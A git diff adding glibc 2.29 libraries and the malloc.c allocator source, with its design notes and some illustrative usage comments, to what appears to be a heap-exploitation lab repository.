+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
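+
+/* A minimal sketch (not from the upstream sources): malloc_info() dumps the
+   per-arena statistics collected above as XML, which is both easier to parse
+   and more detailed than malloc_stats():
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = malloc (1000);
+       free (p);
+       malloc_info (0, stdout);     // options must currently be 0
+       return 0;
+     }
+*/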
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.29/ld-2.29.so b/HeapLAB/.glibc/glibc_2.29/ld-2.29.so
new file mode 100755
index 0000000..71e5893
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29/ld-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29/ld.so.2 b/HeapLAB/.glibc/glibc_2.29/ld.so.2
new file mode 120000
index 0000000..1b67396
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29/ld.so.2
@@ -0,0 +1 @@
+ld-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29/libc-2.29.so b/HeapLAB/.glibc/glibc_2.29/libc-2.29.so
new file mode 100755
index 0000000..627a125
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29/libc-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29/libc.so.6 b/HeapLAB/.glibc/glibc_2.29/libc.so.6
new file mode 120000
index 0000000..89bb464
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29/libc.so.6
@@ -0,0 +1 @@
+libc-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.29/malloc/malloc.c
new file mode 100644
index 0000000..feaf7ee
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29/malloc/malloc.c
@@ -0,0 +1,5609 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2019 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., the number of extra bytes
+       allocated beyond those requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
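+
+/* A worked example of the index macros above (illustrative only), assuming
+   the typical 64-bit defaults SIZE_SZ == 8, MALLOC_ALIGNMENT == 16 and
+   MINSIZE == 32:
+
+     tidx2usize (0)  == 0 * 16 + 32 - 8 == 24    largest usable size in bin 0
+     usize2tidx (24) == csize2tidx (request2size (24))
+                     == csize2tidx (32) == (32 - 32 + 15) / 16 == 0
+     usize2tidx (25) == csize2tidx (48) == (48 - 32 + 15) / 16 == 1
+
+   which matches the "idx 0 bytes 0..24, idx 1 bytes 25..40" table above.  */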
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), realloc(p, 0) would do so as well.
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
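+
+/* A minimal sketch (illustrative only, not part of the implementation) of an
+   alternative MORECORE routine.  glibc routes MORECORE through the __morecore
+   hook declared above, so a replacement only needs to match the
+   void *(*)(ptrdiff_t) signature; this hypothetical one merely forwards to
+   sbrk and maps sbrk's failure value to MORECORE_FAILURE:
+
+     static void *
+     my_morecore (ptrdiff_t increment)
+     {
+       void *result = sbrk (increment);
+       if (result == (void *) -1)
+         return (void *) MORECORE_FAILURE;
+       return result;
+     }
+
+   installed early in program startup with:  __morecore = my_morecore;  */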
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of the fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
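+
+/* Illustrative usage (not part of the implementation) of the behaviour
+   described above -- a zero-byte request still yields a valid, minimum-sized
+   allocation, and an out-of-range request fails with errno set to ENOMEM:
+
+     void *p = malloc (0);            // non-NULL pointer to a minimum-sized chunk
+     void *q = malloc ((size_t) -1);  // far out of range: NULL, errno == ENOMEM
+     free (p);
+*/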
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will,
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
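+
+/* Illustrative usage (not part of the implementation) of the failure
+   behaviour described above -- on failure realloc returns NULL and leaves
+   the original block intact, so the result should not be assigned over the
+   old pointer directly:
+
+     char *p = malloc (100);
+     char *q = realloc (p, 200);
+     if (q != NULL)
+       p = q;          // possibly moved to a new location
+     else
+       free (p);       // p is still valid and still owned by the caller
+*/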
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
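+
+/* Illustrative usage (not part of the implementation); per the description
+   above the alignment should be a power of two, and values of 8 or less gain
+   nothing over plain malloc (error handling omitted):
+
+     void *buf = memalign (64, 1000);        // 64-byte aligned, >= 1000 bytes
+     assert (((uintptr_t) buf & 63) == 0);
+     free (buf);
+*/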
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
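+
+/* Illustrative usage (not part of the implementation) of the parameter table
+   above; mallopt returns 1 on success and 0 otherwise:
+
+     mallopt (M_MXFAST, 0);                    // disable fastbins entirely
+     mallopt (M_TRIM_THRESHOLD, 64 * 1024);    // trim more aggressively
+     mallopt (M_MMAP_THRESHOLD, 1024 * 1024);  // only consider mmap for requests >= 1 MiB
+*/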
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
